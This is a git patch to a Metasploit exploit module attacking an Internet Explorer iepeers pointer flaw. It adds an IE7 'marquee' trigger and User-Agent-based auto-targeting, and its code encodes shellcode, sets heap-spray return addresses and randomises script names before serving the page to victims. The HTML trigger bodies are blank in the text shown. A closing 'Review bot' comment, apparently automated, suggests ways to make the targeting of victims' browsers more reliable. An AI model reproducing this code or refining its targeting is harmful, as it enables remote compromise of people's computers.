From 79e277450a7650032fea45fdfd760b611d424192 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Sat, 27 Mar 2010 01:31:19 +0000
Subject: [PATCH] add reliable IE7 trigger from Nanika
git-svn-id: file:///home/svn/framework3/trunk@8935 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/ie_iepeers_pointer.rb | 114 ++++++++++++++++--
 1 file changed, 102 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/windows/browser/ie_iepeers_pointer.rb b/modules/exploits/windows/browser/ie_iepeers_pointer.rb
index 0b0a67ad6e..b8a3df8812 100644
--- a/modules/exploits/windows/browser/ie_iepeers_pointer.rb
+++ b/modules/exploits/windows/browser/ie_iepeers_pointer.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 'unknown', # original discovery
 'Trancer ', # metasploit module
+ 'Nanika', # HIT2010 IE7 reliable PoC
 'jduck' # minor cleanups
 ],
 'Version' => '$Revision$',
@@ -72,39 +73,93 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' => [
- [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
+ [ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
+ {
+ 'Method' => 'automatic'
+ }
+ ],
+
+ [ 'IE 6 SP0-SP2 (onclick)',
+ {
+ 'Method' => 'onclick',
+ 'Ret' => 0x0C0C0C0C
+ }
+ ],
+
+ # "A great celebration of HIT2010" - http://www.hitcon.org/
+ [ 'IE 7.0 (marquee)',
+ {
+ 'Method' => 'marquee',
+ 'Ret' => 0x0C0C0C0C
+ }
+ ],
 ],
 'DisclosureDate' => 'Mar 09 2010',
 'DefaultTarget' => 0))
 end
+
+ def auto_target(cli, request)
+ mytarget = nil
+
+ agent = request.headers['User-Agent']
+ #print_status("Checking user agent: #{agent}")
+ if agent =~ /Windows NT 6\.0/
+ mytarget = targets[2] # IE7 on Vista
+ elsif agent =~ /MSIE 7\.0/
+ mytarget = targets[2] # IE7 on XP and 2003
+ elsif agent =~ /MSIE 6\.0/
+ mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
+ else
+ print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+ end
+
+ mytarget
+ end
+
+ def on_request_uri(cli, request)
+ if target['Method'] == 'automatic'
+ mytarget = auto_target(cli, request)
+ if (not mytarget)
+ send_not_found(cli)
+ return
+ end
+ else
+ mytarget = target
+ end
+
 # Re-generate the payload
 return if ((p = regenerate_payload(cli)) == nil)
+ print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+
 # Encode the shellcode
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+ shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
 # Set the return\nops
- ret = Rex::Text.to_unescape([target.ret].pack('V'))
+ ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
 # Randomize the javascript variable names
 j_shellcode = rand_text_alpha(rand(100) + 1)
 j_nops = rand_text_alpha(rand(100) + 1)
 j_slackspace = rand_text_alpha(rand(100) + 1)
 j_fillblock = rand_text_alpha(rand(100) + 1)
- j_memory = rand_text_alpha(rand(100) + 1)
+ j_memory = rand_text_alpha(rand(100) + 1)
 j_counter = rand_text_alpha(rand(30) + 2)
- j_ret = rand_text_alpha(rand(100) + 1)
+ j_ret = rand_text_alpha(rand(100) + 1)
 j_array = rand_text_alpha(rand(100) + 1)
 j_function1 = rand_text_alpha(rand(100) + 1)
 j_function2 = rand_text_alpha(rand(100) + 1)
- j_object = rand_text_alpha(rand(100) + 1)
+ j_object = rand_text_alpha(rand(100) + 1)
- j_id = rand_text_alpha(rand(100) + 1)
+ j_id = rand_text_alpha(rand(100) + 1)
- # Build out the message
- html = %Q|
+ # Construct the final page
+ case mytarget['Method']
+
+ when 'onclick'
+ html = %Q|
 |
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ when 'marquee'
+ j_attrib = rand_text_alpha(6);
+ html = %Q|
+
+
+
+
+
+
+|
+
+ end
 # Transmit the compressed response to the client
 send_response(cli, html, { 'Content-Type' => 'text/html' })
@@ -146,5 +236,5 @@ document.getElementById('#{j_id}').onclick();
 end
-end
-
+end
+
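Review bot: The first branch of auto_target selects targets[2] on `/Windows NT 6\.0/` alone, so any non-IE client on Vista (a Firefox UA carries that token too) is handed the marquee trigger instead of the 404 the else branch sends unknown browsers, and since that branch and the `/MSIE 7\.0/` branch resolve to the same target it adds nothing but that false positive. Drop it and let the IE7 regex decide: `if agent =~ /MSIE 7\.0/` followed by `mytarget = targets[2] # IE7 on XP, 2003 and Vista`. Note also that `/MSIE 7\.0/` will, as far as I recall, match IE8 in Compatibility View (its UA reports MSIE 7.0 with a Trident token), so it is worth confirming that the marquee trigger holds there or rejecting UAs containing `Trident/`. The closing `end` of on_request_uri and the two html heredoc bodies fall outside what this hunk shows.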